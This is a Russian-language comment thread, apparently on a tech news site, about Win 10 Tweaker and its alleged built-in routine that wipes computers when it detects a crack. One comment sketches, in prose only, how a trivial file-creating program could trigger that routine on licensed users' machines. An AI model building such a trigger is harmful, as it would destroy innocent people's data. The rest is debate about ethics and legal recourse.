Самое смешное, что в результате вот этой мелкой мстительности автор ничего не получает (попавшиеся будут в дальнейшем бежать от его поделок, как от огня), а теряет многое — репутацию, например.
С другой стороны, ситуация на руборде обсуждается уже полгода, и nobody cares.
- institor сегодня в 14:37
  –1
  Ну руборд, так-то, закрыт — нужна регистрация даже для просмотра… обсуждение идет в узком кругу
  - mistergrim сегодня в 14:40
    
    0
    Закрыт только варезник. Но там и в открытой теме информации предостаточно.
    Ну и не только на руборде, давно уже обсуждение за пределы вытекло.
Catslinger сегодня в 14:32
0
Ну и где блин Роскомпозор? Где родная милиция? Вот же настоящий киберзлоумышленник, выдал себя с потрохами, почему бездействуют? Заблокировать сайт, заблокировать платежи на счёт? Выдать предписание тем антивирусам, что имеют юрлицо в россии, чтобы удаляли? Где?
Sanctuary_s сегодня в 14:34
0
Ну, справедливости ради, надо сказать, что AV итак все триггерятся.
MerCrow сегодня в 14:42
–12
Забавно наблюдать, как люди поливают грязью человека за то, что тот просто решил защитить свой труд (а создание такого твикера таки труд и немалый) от спирачивания куда бОльшими засранцами, чем он сам. Но нет, надо же раздуть "Кококо, бекдор! Автор говнюк, кококо!" По мне так люди, которые с пеной у рта орут, что этот твикер орудие зла, а его автор страшнее любого пирата ничем не лучше тех любителей и фанатиков данного продукта, о которых они же и писали выше.
- Sanctuary_s сегодня в 14:42
  +2
  Посмешил.
- mistergrim сегодня в 15:10
  +1
  Это «защита» сродни той, что если у меня сосед тачку на даче сп…т, я ему дом сожгу. Защитил своё имущество.
  - Sanctuary_s сегодня в 15:12
    
    0
    Продал дом, купил ворота — стал я запираться.
  - unsignedchar сегодня в 16:58
    
    0
    если у меня сосед тачку на даче сп…т, я ему дом сожгу
    
    Сожгу все дома, где есть тачки, похожие на мою.
- Catslinger сегодня в 15:12
  –1
  Узнав о ситуации, пишем малварь, которая триггерит эту заложенную бомбу у лицензионных пользователей. Причём на эту малварь даже самые параноистые антивирусы не гавкнут — она создаёт один пустой файл. Так что можно спокойно залить в доверенные каталоги. В итоге у кучи людей убивается комп. Ну и кто больше поспособствовал происходящему — мы или автор изначальной бомбы?
  
  Программа имеет полное право защищаться от взлома. И хорошо защищается — вон Directory Opus до сих пор сломать не могут, хотя у него нет никакого серверного компонента в защите. Но если она делает хоть что-то большее, чем просто отказывается работать — то это уже малварь от разработчика, и за такое нужно удалять отовсюду, как любую малварь, и уголовку вешать, если получится.
  
  Из описания этой бомбы я так понял, что если кто-то сначала юзал кряк, а потом заплатил — то у него тоже сработает: следы-то остались. Та же история была однажды с FLStudio: она при обнаружении кряка удаляла только себя и свою папку с пресетами. Вот только оказалось, что 1) куча народу хранила свои проекты в стандартной папке с пресетами, потому что туда всё сохранялось по умолчанию. 2) Часть заплативших юзеров тоже задело. С тех пор FLStudio так не делает, хотя её-то пиратят вообще по чёрному.
- 4eyes сегодня в 15:29
  +1
  Попутно, этот «труд» чистит компы от 50 установленных приложений пользователям лицензионной версии при запуске портабельного софта собранного с помощью turbo.net.
  
  … от спирачивания куда бОльшими засранцами, чем он сам.
  Вот вы серьёзно? Это звучит сродни "(персона1) навалил кучу соседу под дверь, но это не страшно, т.к. в мире существует куча засранцев, которые вообще выбивают двери к черту в процессе кражи со взломом". Или "(персона2) отжал часы в подворотне, но это не страшно, некоторые вообще в процессе грабежа забирают все что могут еще и по голове бьют".
- MTyrz сегодня в 17:17
  +2
  Единственный коммент, зарегистрировался сегодня…
  Автор поделия, покажите личико.
- JSFilin сегодня в 18:03
  0
  Это незаконно.
NuckChorris сегодня в 15:08
+1
Вот он себе на статью зарабатывает
- Gengenid сегодня в 16:56
  0
  А автор из России? Есть его данные?
  - Sanctuary_s сегодня в 16:57
    
    0
    Он ИП из Томска.
    - Gengenid сегодня в 17:05
      
      0
      
      И полгода это обсуждают и никто заявление в полицию не написал? Это же УК РФ 273 ч.2.
      Вы не будете против, если я со ссылкой на вашу статью заявление напишу?
      - Sanctuary_s сегодня в 17:16
        
        –2
        
        Не надо ни меня, ни статью приплетать, ни заявление подавать. Настоящие пострадавшие итак подадут, если надо. Я не призываю ни к каким действиям, кроме порицания его поступка.
        
        Gengenid сегодня в 17:21
        
        0
        
        Ок. Хотя зря.
        
        NuckChorris сегодня в 18:50
        
        0
        
        Вот лучше было бы так — «Прошу прокуратуру считать эту статью основанием для возбуждения уголовного дела против… по статье...»
        
        Gengenid сегодня в 19:02
        
        0
        
        Не прокуратуру, МВД. Прокуратура предварительным следствием не занимается.
Saivrem сегодня в 15:08
0
Очень наглядная статья. Всегда удивлялся тому, с какой охотой люди доверяют «Васе» и винят во всех смертных грехах корпорации, как будто «Вася» по умолчанию свят.
LexaZ сегодня в 15:45
0
… а ведь если бы удаляла программа сама себя и отправляла, предположим, id лицензии разработчику, то таких проблем бы не было. Спокойнее надо быть, это, как показывает практика, полезно. ИМХО
remountd сегодня в 16:37
0
Написал модераторам на заблокированном в РФ торрент-трекере (у него есть приставка ннм) о наличии вредоноса в последнем релизе Win 10 Tweaker, со ссылкой на статью и пункт нарушаемых правил. И меньше чем за пять минут был отправлен в бан.

Я конечно может наивный и в чём-то глупый человек, который верит в премодерацию вареза на ресурсе, предназначение которого — выкладывание и хранение вареза; и в то, что с виду "бесплатный" контент не может специально оказаться заражённым чем-то другим по усмотрению администрации ресурса. Но просто ещё не было поводов, с разбором полётов, усомниться в обратном.

Заголовок спойлера
- drdead сегодня в 17:11
  0
  Если вам интересно, вот последний комментарий в том треде от "Куратора программ":
  По причине наплыва разносчиков сплетен обсуждение временно закрыто.
  Все желающие получить сатисфакцию от автора по поводу очередной сплетни по очернению программы, идите на авторский сайт и там требуйте пояснений. Ссылка в описании раздачи есть.
  - Sanctuary_s сегодня в 17:17
    
    0
    Уже написал моберу на rutracker. Сказал, что все можно опубликовать. Но я не понял пока где)
GriegMount сегодня в 17:05
0
В этой программе реализован бан по железу, причём не важно нарушили вы пользовательское соглашение или нет. Мой случай был таков, что я купил PRO версию Win10Tweaker и захотел использовать её на 2-ух устройствах. На одном из стримов или видео автора я услышал что это абсолютно нормально и можно попросить лицензию для второго ПК. В итоге он это отрицал, а потом начал вымогать деньги с условием приобрести ещё одну лицензию в течении часа или я получу бан по железу на 2-ух стройствах. В итоге денег я ему не скинул, потерял PRO версию и получил бан по железу. Делайте вывод сами о натуре данного homo.
- JerleShannara сегодня в 17:58
  0
  Ммм, прямо аж желание расчехлить старушку Иду Хексрееву появилось.
  - vladkorotnev сегодня в 18:13
    
    0
    Думается, для такого, пардон, высера, проще для Софии гуи написать, чем тянуться до ярлыка иды
    - Sanctuary_s сегодня в 18:17
      
      0
      
      Пишется нами. :) И оболочка (wrapper) от Дэвида была переписана полностью. Скоро он 2.0 релизнет.
UnoLagrima сегодня в 17:59
0
Что думаешь по поводу O&O ShutUp10 -Free antispy tool for Windows 10?